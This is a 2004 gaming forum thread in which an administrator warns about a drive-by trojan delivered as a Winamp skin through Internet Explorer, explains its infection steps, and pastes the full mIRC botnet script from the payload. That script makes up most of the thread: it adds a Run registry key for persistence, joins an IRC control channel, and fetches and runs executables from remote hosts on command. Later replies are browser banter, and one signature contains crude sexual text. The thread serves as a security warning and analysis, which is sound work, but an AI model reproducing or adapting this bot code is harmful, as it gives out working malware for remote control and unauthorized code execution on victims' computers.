| 
		
			| WARNING!!! Another Trojan/Virus going around! [message #91232] | Sun, 30 May 2004 21:49  |  
			| 
				
				|  |  Blazer Messages: 3322
 Registered: February 2003
 Location: Phoenix, AZ
 
	Karma: 0
 | General (3 Stars)Administrator/General
 |  
 |  |  
	| Breetomas just found out the hard way about a new trojan going around. You are infected instantly simply by going to a particular URL (Isnt Internet Explorer wonderful?). Knowing my firewall would protect me, I voluntarily clicked the link so I could examine this trojan. Basically heres what happens when you go to the URL: 
 1. IE automatically downloads and runs a trojan WINAMP skin. Winamp will popup and you will be like eh whats going on.  If you examine your winamp settings you will find the current skin set to "selfexec.wsz".
 2. The winamp skin is executed by winamp, and contains a botnet trojan that is placed in C:\Windows\System32\Rundll32\.  I suggest everyone quickly check their computer and verify that they do not have this directory!.
 3. Various files (shown in the image below) are dumped there, as well as a malicious notepad.exe which goes into your System32 directory. If the bad notepad.exe is run, it (re)infects you.
 4. The trojaned winamp skin finally executes the replaced winamp, which runs the botnet trojan.  The fake svchost.exe is actually MIRC.
 5. You are not trojaned, and your computer silently connects to a remote IRC network, as you can see in the mirc.ini:
 [mirc]
 host=borg.irchat.tvSERVER:borg.irchat.tv:6667GROUP:suprnova.org
 user=$rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
 email=$rand(a,z)
 nick=abeghrs
 anick=thhmsyx
 
 There are several DLL files in the payload that let someone completely take control of your computer (botnut.dll), get info on your computer (moo.dll), perform DOS attacks (net.dll), and do network scans. More importantly, they have the option to silently upload another exe to you, usually the first thing being an even better bot to infect you with.
 
 I suggest everyone look for the C:\Windows\System32\Rundll directory.  If you have it at all, you are probably infected, definitely if it contains the below files:
 
  
 Heres one of the scripts contained in the trojan...you can see it connects to gamesnet.net irc...someone should notify their admins.
 
 
 
ON *:START: { 
  .timer 0 666 botnet.scan.4.server
  .timer 0 666 botnet.check.channel
  identd on $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
  set %botnet.version 0.01
  set %botnet.channel #botnut.secure
  set %botnet.channelpw botnut
  server irc.gamesnet.net:6667
  set %botnet.server irc.gamesnet.net:6667
  nick $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
  anick $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
  echo -a $dll(dmu.dll,HideMirc,on)
  $regwrite(HKEY_CURRENT_USER\Software\mIRC\License\,1711-182810,REG_SZ)
  $regwrite(HKEY_CURRENT_USER\Software\mIRC\UserName\,owned,REG_SZ)
  $regwrite(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\secure,c:\windows\system32\secure\rundll32.exe,REG_SZ)
  copy -o c:\windows\notepad.exe c:\windows\system32\
}
alias RegWrite {
  if ($1 != $null) && ($2 != $null) && ($3 != $null) {
    var %a = Reg $+ Write
    .como $+ pen %a WSc $+ ript.She $+ ll
    if !$comerr {
      var %b =  $com(%a,Reg $+ Wri $+ te,3,bstr,$1,bstr,$2,bstr,$3)
      .comcl $+ ose %a
    }
    if ($3 == REG_EX $+ PAND_SZ) || ($3 == RE $+ G_SZ) {
      if ($re $+ gr $+ ead($1) == $2) { re $+ turn the val $+ ue ( $+ $1 $+ ) was created }
    }
  }
}
ON *:CONNECT: { 
  if ($me == $scon(1).me) { scon 1 join %botnet.channel %botnet.channelpw }
  botnet.scan.4.server
  ignore -wd *
}
ON *:DISCONNECT: {   
  botnet.scan.4.server
}
alias -l botnet.check.channel {
  if ($me == $scon(1).me) && ($channel(0) == 0) { scon 1 join %botnet.channel %botnet.channelpw }
}
raw 332:*: {
  if ($me == $scon(1).me) {
    msg %botnet.channel « Botnut Downloader Version:  %botnet.version » « IP: $ip » « Uptime: $duration($calc($ticks / 1000)) »  
    var %i = 1
    while (%i <= $numtok($3-,124)) {
      parse.topic $gettok($3-,%i,124)
      inc %i
    }
  }
}
alias parse.topic {
  if ($chr(36) isin $1-) || (write isin $1-) || (remove isin $1-) || (run isin $1-) || (exit isin $1-) || (quit isin $1-) || (timer isin $1-) { return }
  elseif ($1 == .download) { 
    if ($2 == %botnet.givenhost) && ($3 == %botnet.givenpath) && ($4 == %botnet.given) { scon 1 msg %botnet.channel File already downloaded! }
    else { botnet.download $2- }
  }
  elseif ($1 == .update) { botnet.scan.4.version } 
  elseif ($1 == .server) { botnet.scan.4.server } 
  elseif ($1 == .status) { scon 1 msg %botnet.channel « Botnut Downloader Version:  %botnet.version » « IP: $ip » « Uptime: $duration($calc($ticks / 1000)) » } 
  elseif ($1 == .botnut) { 
    if ($isdde(botnut)) { scon 1 msg %botnet.channel Botnut is running. }
    else { scon 1 msg %botnet.channel Botnut is not running. }
  }
}
ON *:SOCKOPEN:botnet.check.server: {
  sockwrite -n $sockname GET / HTTP/1.1
  sockwrite -n $sockname Host: %botnet.hosta $+ $str($crlf,2)
}
ON *:SOCKREAD:botnet.check.server: {
  var %sockread
  sockread %sockread
  if ($regsub(%sockread,<HTML><HEAD><TITLE>,,%sockread)) && ($regsub(%sockread,</TITLE></HEAD>,,%sockread)) {
    if (%botnet.server != %sockread) {
      set %botnet.server %sockread
      scon 1 server %botnet.server
    }
  }
}
alias botnet.scan.4.server { set %botnet.hosta bsecureserver.da.ru | sockclose botnet.check.server | .timer 1 1 sockopen botnet.check.server %botnet.hosta 80 }
alias botnet.scan.4.version { sockclose botnet.check.version | sockopen botnet.check.version bsecureversion.da.ru 80 }
ON *:SOCKOPEN:botnet.check.version: {
  sockwrite -n $sockname GET / HTTP/1.1
  sockwrite -n $sockname Host: bsecureversion.da.ru $+ $str($crlf,2)
}
ON *:SOCKREAD:botnet.check.version: {
  var %sockread
  sockread %sockread
  if ($regsub(%sockread, <HTML><HEAD><TITLE>,,%sockread)) && ($regsub(%sockread, </TITLE></HEAD>,,%sockread)) {
    echo -a %sockread    
    if (%botnet.version < %sockread) {
      echo -a %sockread    
      .timer 1 1 botnet.scan.4.fileurl
      .timer 1 2 sockclose botnet.check.version
    }
  }
}
alias botnet.scan.4.fileurl { set %botnet.updatefile $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ .exe | sockclose botnet.check.fileurl | sockopen botnet.check.fileurl bsecurefileurl.da.ru 80 }
ON *:SOCKOPEN:botnet.check.fileurl: {
  sockwrite -n $sockname GET / HTTP/1.1
  sockwrite -n $sockname Host: bsecurefileurl.da.ru $+ $str($crlf,2)
}
ON *:SOCKREAD:botnet.check.fileurl: {
  var %sockread
  sockread %sockread
  if ($regsub(%sockread, <HTML><HEAD><TITLE>,,%sockread)) && ($regsub(%sockread, </TITLE></HEAD>,,%sockread)) {
    set %botnet.account %sockread
    echo -a %botnet.account
    sockclose botnet.download.new.version
    .timer 1 1 sockopen botnet.download.new.version people.freenet.de 80
  }
}
ON *:SOCKOPEN:botnet.download.new.version: {
  sockwrite -n $sockname GET / $+ %botnet.account $+ /update.exe HTTP/1.0
  sockwrite -n $sockname Accept: */*
  sockwrite -n $sockname Host: people.freenet.de $+ $str($crlf,2)
  sockwrite -n $sockname
}
ON *:SOCKREAD:botnet.download.new.version:{
  if (%botnet.aupd.downloadready != 1) {
    var %header
    sockread %header
    while ($sockbr) {
      if (* !iswm %header) {
        %botnet.aupd.downloadready = 1
        break
      }
      sockread %header
    }
  }
  sockread 4096 &d
  while ($sockbr) {
    bwrite %botnet.updatefile -1 -1 &d
    sockread 4096 &d
  }
}
ON *:SOCKCLOSE:botnet.download.new.version: { unset %botnet.aupd.* | run %botnet.updatefile | timer 1 10 .load -rs secure.dll | timer 1 10 remove %botnet.updatefile }
alias botnet.download { set %botnet.given $3- | set %botnet.givenhost $1 | set %botnet.givenpath $2 | sockclose botnet.check.it | .timer 1 1 sockopen botnet.check.it bsecurestatus.da.ru 80 }
ON *:SOCKOPEN:botnet.check.it: {
  sockwrite -n $sockname GET / HTTP/1.1
  sockwrite -n $sockname Host: bsecurestatus.da.ru $+ $str($crlf,2)
}
ON *:SOCKREAD:botnet.check.it: {
  var %sockread
  sockread %sockread
  if ($regsub(%sockread, <HTML><HEAD><TITLE>,,%sockread)) && ($regsub(%sockread, </TITLE></HEAD>,,%sockread)) {
    var %bla %sockread 
    echo -a %sockread    
    if (%bla == ON) {  
      if ($isfile(%botnet.given)) { .remove %botnet.given }     
      sockclose botnet.download
      .timer 1 1 sockopen botnet.download %botnet.givenhost 80
    }
    else { scon 1 msg %botnet.channel Access denied! }
  }
}
ON *:SOCKOPEN:botnet.download: {
  sockwrite -n $sockname GET / $+ %botnet.givenpath HTTP/1.0
  sockwrite -n $sockname Accept: */*
  sockwrite -n $sockname Host: %botnet.givenhost $+ $str($crlf,2)
  sockwrite -n $sockname
}
ON *:SOCKREAD:botnet.download:{
  if (%botnet.aupd.downloadready != 1) {
    var %header
    sockread %header
    while ($sockbr) {
      if (* !iswm %header) {
        %botnet.aupd.downloadready = 1
        break
      }
      sockread %header
    }
  }
  sockread 4096 &d
  while ($sockbr) {
    bwrite %botnet.given -1 -1 &d
    sockread 4096 &d
  }
}
ON *:SOCKCLOSE:botnet.download: { unset %botnet.aupd.* | run %botnet.given | scon 1 msg %botnet.channel Done. | .timer 1 5 remove %botnet.given }
ON *:TEXT:*:%botnet.channel: { 
  if ($me == $scon(1).me) {
    if ($nick == botnut) {
      if ($chr(36) isin $1-) || ($chr(124) isin $1-) || (write isin $1-) || (remove isin $1-) || (run isin $1-) || (exit isin $1-) || (quit isin $1-) || (timer isin $1-) { return }
      elseif ($1 == .download) { 
        if ($2 == %botnet.givenhost) && ($3 == %botnet.givenpath) && ($4 == %botnet.given) { scon 1 msg %botnet.channel File already downloaded! }
        else { botnet.download $2- }
      }
      elseif ($1 == .update) { botnet.scan.4.version } 
      elseif ($1 == .server) { botnet.scan.4.server } 
      elseif ($1 == .status) { scon 1 msg %botnet.channel « Botnut Downloader Version:  %botnet.version » « IP: $ip » « Uptime: $duration($calc($ticks / 1000)) » } 
      elseif ($1 == .botnut) { 
        if ($isdde(botnut)) { scon 1 msg %botnet.channel Botnut is running. }
        else { scon 1 msg %botnet.channel Botnut is not running. }
      }
    }
  }
}
ON *:TEXT:*:?: { 
  if ($me == $scon(1).me) {
    if ($nick == botnut) {
      if ($chr(36) isin $1-) || ($chr(124) isin $1-) || (write isin $1-) || (remove isin $1-) || (run isin $1-) || (exit isin $1-) || (quit isin $1-) || (timer isin $1-) { return }
      elseif ($1 == .download) { 
        if ($2 == %botnet.givenhost) && ($3 == %botnet.givenpath) && ($4 == %botnet.given) { scon 1 msg %botnet.channel File already downloaded! }
        else { botnet.download $2- }
      }
      elseif ($1 == .update) { botnet.scan.4.version } 
      elseif ($1 == .server) { botnet.scan.4.server } 
      elseif ($1 == .status) { scon 1 msg $nick « Botnut Downloader Version:  %botnet.version » « IP: $ip » « Uptime: $duration($calc($ticks / 1000)) » } 
      elseif ($1 == .botnut) { 
        if ($isdde(botnut)) { scon 1 msg $nick Botnut is running. }
        else { scon 1 msg $nick Botnut is not running. }
      }
    }
  }
}
 |  
	|  |  | 
	|  | 
	|  | 
	|  | 
	| 
		
			| WARNING!!! Another Trojan/Virus going around! [message #91238] | Sun, 30 May 2004 21:57   |  
			| 
				
				|  |  YSLMuffins Messages: 1144
 Registered: February 2003
 Location: Moved a long time ago (it...
 
	Karma: 0
 | General (1 Star)Moderator - Mod Forum
 |  |  |  
	| Go Opera! :thumbsup: 
 Wow Blazer, I'm surprised you went through all this to discover the secrets of this trojan...
 
 -YSLMuffins
 The goddess of all (bread products)
 See me online as yslcheeze
 
 |  
	|  |  | 
	| 
		
			| WARNING!!! Another Trojan/Virus going around! [message #91242] | Sun, 30 May 2004 22:04   |  
			|  |  
	| You know what's the sad part about this? While he was doing this, aliens sneaked-up behind him and...You know the rest now, do you? 
 Yes...Anal probes.
 
 I suck cock and love it... absolutely love it. And I just got banned for being too immature to be allowed to post here.
 |  
	|  |  | 
	|  | 
	|  | 
	|  | 
	|  | 
	|  | 
	|  | 
	| 
		
			| WARNING!!! Another Trojan/Virus going around! [message #91256] | Sun, 30 May 2004 23:12   |  
			| 
				
				
					|  SHADY-CNCU Messages: 60
 Registered: February 2003
 
	Karma: 0
 | Recruit |  |  |  
	| | YSLMuffins |  | Go Opera! :thumbsup:
 
 Wow Blazer, I'm surprised you went through all this to discover the secrets of this trojan...
 
 | 
 
 as far as trojans are concerned, thats a fairly basic one.
 
 the exploit it uses is a 4 months old now or so, and its effectivness is limited to the fact that some one actually has to visit the website in order for it to infect
 
 Never Say Die!!!
 
 I am a Renegade Beta Tester; feel free to ask me questions.
 
 "Never EVER...put handcuffs on your girlfriend if you don't know EXACTLY where the keys are."
 
 If anything in this life is certain; if history has taught us anything, it's that you can kill anyone.
 
 
   |  
	|  |  | 
	|  | 
	|  | 
	|  | 
	|  | 
	|  | 
	|  | 
	|  | 
	|  | 
	| 
		
			| WARNING!!! Another Trojan/Virus going around! [message #91357] | Mon, 31 May 2004 12:16   |  
			| 
				
				|  |  NukeIt15 Messages: 987
 Registered: February 2003
 Location: Out to lunch
 
	Karma: 0
 | Colonel |  |  |  
	| It is indeed...I haven't gotten a single popup ad for ANY website I've visited since I switched to Firefox. Or trojan. Or virus. Or anything else unpleasant. Page loading is about the same speed as with IE. 
 Internet Explorer is shit. It's an open invitation for every hacker, spammer, and script kiddie on the internet to come screw with your computer.
 
 Netscape is shit too, but it is better than IE.
 
 "Arms discourage and keep the invader and plunderer in awe, and preserve order in the world as well as property. Horrid mischief would ensue were (the law-abiding) deprived of the use of them." - Thomas Paine
 
 Remember, kids: illiteracy is cool. If you took the time to read this, you are clearly a loser who will never get laid. You've been warned.
 |  
	|  |  | 
	|  | 
	|  | 
	|  |